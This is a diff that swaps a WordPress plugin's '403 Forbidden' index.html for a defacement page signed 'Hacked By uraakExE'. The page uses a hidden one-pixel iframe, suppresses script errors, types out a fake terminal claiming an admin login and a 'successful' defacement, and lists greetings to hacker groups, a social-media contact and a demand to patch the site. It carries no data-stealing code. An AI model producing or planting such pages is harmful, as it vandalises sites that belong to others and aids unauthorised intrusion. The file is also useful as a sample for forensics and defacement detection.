--- a/wp-content/plugins/custom-content-type-manager/index.html
+++ b/wp-content/plugins/custom-content-type-manager/index.html
@@ -1,10 +1,272 @@
-<html>
+
+
+
 <head>
-	<title>403 Forbidden</title>
-</head>
-<body>
+<title>=uraakExE=</title>
+<link rel="SHORTCUT ICON" href="http://www.hfcc3.com/sitebuildercontent/sitebuilderpictures/flag_philippines.gif" type="image/x-icon"/>  
 
-<p>Directory access is forbidden.</p>
 
-</body>
-</html>
+<meta content='Hacked By uraakExE' name='description'/>
+<meta content='Hacked By uraakExE,' name='keywords'/>
+<meta content='=uraakExE=' name='Author'/>
+
+
+<center><iframe width="1" height="1" src="http://www.youtube.com/watch?feature=player_detailpage&v=HORkT4a2MhQ" frameborder="0" allowfullscreen></iframe></center>
+
+<SCRIPT language=JavaScript>  
+
+<!-- 
+
+  
+
+function SymError() 
+
+{ 
+
+  return true; 
+
+} 
+
+  
+
+window.onerror = SymError; 
+
+  
+
+//-->  
+
+</SCRIPT>  
+
+<!--[if IE ]> 
+
+<STYLE type=text/css>BODY { 
+
+    OVERFLOW: hidden 
+
+} 
+
+v\:* { 
+
+    BEHAVIOR: url(#default#VML) 
+
+} 
+
+</STYLE> 
+
+<![endif]-->  
+
+<SCRIPT language=Javascript><!-- 
+
+var tl=new Array( 
+
+"Connecting to server@root:~$ .....",
+
+"Connected! .......",
+
+" ",
+
+"=======================", 
+
+"User : admin   /Ok/", 
+
+"Password :  *********   /Ok/", 
+
+"=======================", 
+
+" Connecting ....", 
+
+" Connected! ......", 
+
+"=======================",
+
+" Defacing Website.....",
+
+" Website Defacing Successful! ...",
+
+" Done :)",
+
+"=======================", 
+
+"server@root:~$   cat /etc/username", 
+
+"",
+
+
+" ####################################################",  
+
+" #", 
+
+" #    Hacked By uraakExE", 
+
+" #", 
+
+" ####################################################",
+
+" #",  
+
+" # ($) root@server :  root@server ", 
+
+" # ($) Site: Not available ", 
+
+" # ($) Greetz : Pinoy Vendetta | Family Pride | Anonymous Caloocan | Affliction X | Anonymous Philippines | Symbianize Hackers | Alab Hackers | Philippines Cyber Army | xDevil Hackers | WeedHead Hackers ",
+
+" # ($) LexuS | Pinoy Pride | Redreds | Cz Zylle | Mizuki ",
+
+" # [+] |> https://www.facebook.com/uraak.exe.5 <|| Add Me :) ",
+
+" #", 
+ 
+" ####################################################",
+
+" #",  
+
+" [+] Please Patch your Site! ", 
+
+" [+] I Hacked this Site to inform YOU that your SECURITY is LOW!  ", 
+
+" [+] DEAR ADMIN : YOUR SITE IS VULNERABLE! PLEASE IMPROVE IT'S SECURITY!  ",
+
+" #", 
+
+" ####################################################",  
+
+"", 
+
+"Disconnecting to server@root:~$",
+
+"Disconnected! .... " 
+
+); 
+
+var speed=50; 
+
+var index=0; text_pos=0; 
+
+var str_length=tl[0].length; 
+
+var contents, row; 
+
+  
+
+function type_text() 
+
+{ 
+
+  contents=''; 
+
+  row=Math.max(0,index-20); 
+
+  while(row<index) 
+
+    contents += tl[row++] + '\r\n'; 
+
+  document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + "_"; 
+
+  if(text_pos++==str_length) 
+
+  { 
+
+    text_pos=0; 
+
+    index++; 
+
+    if(index!=tl.length) 
+
+    { 
+
+      str_length=tl[index].length; 
+
+      setTimeout("type_text()",500); 
+
+    } 
+
+  } else 
+
+    setTimeout("type_text()",speed); 
+
+  
+
+} 
+
+//--></SCRIPT>  
+
+  
+
+<STYLE fprolloverstyle="">A:hover { 
+
+     TEXT-DECORATION: overline 
+
+} 
+
+
+TEXTAREA { 
+
+    background-color: transparent;
+border: none; FONT: 14px Verdana, Arial, Helvetica, sans-serif; COLOR: #00ff00;  
+
+}  
+
+
+
+</STYLE>  
+
+  
+
+</HEAD>  
+
+<center>
+
+<BODY   
+
+
+onload=type_text() onclick='alert("uraakExE was Here Please Improve your SECURITY!")'>  
+
+
+<STYLE type=text/css>BODY { 
+
+
+
+    background: url(http://fc04.deviantart.net/fs71/f/2013/087/5/b/pizap_com13645713200461_by_execute26-d5zlwr1.jpg)  center no-repeat fixed; 
+  -webkit-background-size: cover;
+  -moz-background-size: cover;
+  -o-background-size: cover;
+  background-size: cover; background-color:#000000;
+ } 
+
+
+
+</STYLE>  
+
+<br><br>
+
+
+<P><BR></P>  
+
+<TABLE BORDER="0" cellpadding="0" CELLSPACING="0">
+<TR>
+
+<TD WIDTH="661" HEIGHT="461" BACKGROUND="http://s2.postimage.org/oiwxx014p/btterminal.png" VALIGN="top" ><br><br>
+
+          
+  
+
+
+ 
+
+            <H2 align=center><FONT face=Impact  
+
+
+            color=#ffffff></FONT><FONT face=Impact color=##FF0000></FONT></H2><FONT face=Impact 
+
+
+            color=#FFFFFF></FONT>  
+
+            <FONT face=Impact color=#FFFFFF></FONT>  
+
+            <FORM><FONT face=Impact color=#FF0000><TEXTAREA rows=22.5 cols=87></TEXTAREA>  
+
+            </FONT></FORM></TD>
+</TR>
+</TABLE>
+</center>
+</BODY></HTML>  
